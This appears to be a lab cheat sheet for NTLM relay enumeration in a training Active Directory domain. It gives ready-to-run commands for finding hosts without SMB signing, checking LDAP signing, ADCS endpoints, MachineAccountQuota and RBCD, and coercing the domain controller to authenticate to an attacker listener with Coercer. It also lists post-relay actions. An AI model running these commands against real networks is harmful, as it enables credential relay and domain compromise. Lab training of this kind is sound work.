Relay enumeration answers three questions: which targets accept relay, which sources can be coerced, and which post-relay action is worth attempting.
Variables
export DOMAIN=ootw.local
export DC=10.10.10.200
export ATTACKER=10.10.10.100
export USER=student
export PASS='student'
Find SMB signing state
nxc smb 10.10.10.0/24 --gen-relay-list smb-relay-targets.txt
nxc smb 10.10.10.0/24 -u "$USER" -p "$PASS" --gen-relay-list smb-relay-targets.txt
cat smb-relay-targets.txt
Check SMB signing manually
nxc smb 10.10.10.200 -u "$USER" -p "$PASS"
nmap --script smb2-security-mode -p445 10.10.10.0/24
LDAP signing and channel binding indicators
ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=ootw,DC=local" "(cn=Directory Service)" ldapServerIntegrity msDS-Other-Settings
GPO paths for LDAP settings
ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "DC=ootw,DC=local" "(objectClass=groupPolicyContainer)" displayName gPCFileSysPath
ADCS relay targets
certipy find -u "$USER@$DOMAIN" -p "$PASS" -dc-ip $DC -enabled -stdout
curl -I http://ca.ootw.local/certsrv/
curl -k -I https://ca.ootw.local/certsrv/
MachineAccountQuota
ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "DC=ootw,DC=local" "(objectClass=domainDNS)" ms-DS-MachineAccountQuota
Existing RBCD
ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "DC=ootw,DC=local" "(&(objectCategory=computer)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))" sAMAccountName dNSHostName msDS-AllowedToActOnBehalfOfOtherIdentity
Spooler check
nxc smb 10.10.10.0/24 -u "$USER" -p "$PASS" -M spooler
Coercer scan
coercer scan -d $DOMAIN -u $USER -p "$PASS" --target 10.10.10.200 --listener $ATTACKER
coercer coerce -d $DOMAIN -u $USER -p "$PASS" --target 10.10.10.200 --listener $ATTACKER
Responder analyze mode
sudo responder -I eth0 -A
Windows Inveigh listen-only
.\Inveigh.exe -NBNS Y -LLMNR Y -DNS Y -HTTP Y -SMB Y -Console 1 -FileOutput Y
What to record
- Hosts with SMB signing not required.
- DC LDAP signing and channel binding state.
- ADCS HTTP enrollment URLs.
- Templates usable by machine accounts and users.
- Targets with Print Spooler enabled.
- Targets that Coercer can trigger.
- MachineAccountQuota value.
- Potential post-relay action: SMB exec, LDAP RBCD, LDAP shadow credentials, ADCS cert.